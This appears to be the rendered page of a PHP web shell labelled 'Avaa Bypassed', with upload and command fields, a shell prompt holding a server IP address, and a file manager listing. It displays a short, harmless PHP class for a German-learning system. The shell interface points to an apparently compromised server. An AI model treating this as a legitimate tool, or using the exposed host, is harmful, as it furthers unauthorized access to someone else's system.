404

[ Avaa Bypassed ]




Upload:

Command:

botdev@18.191.187.115: ~ $
<?php 
class GermanLearnSystem extends LearnSystem {
	function __construct(TranslateGerman $TG)
    {
        // parent::__construct($TG, "ok");
        parent::__construct($TG, $this->callBackData);
    }
    function init(){
        $this->db = new GermanLearnSystemDatabase($this->getTG());
    }
        
   
}

Filemanager

Name Type Size Permission Actions
GermanLearnSystem.database.class.php File 10.73 KB 0755
GermanLearnSystem.php File 328 B 0755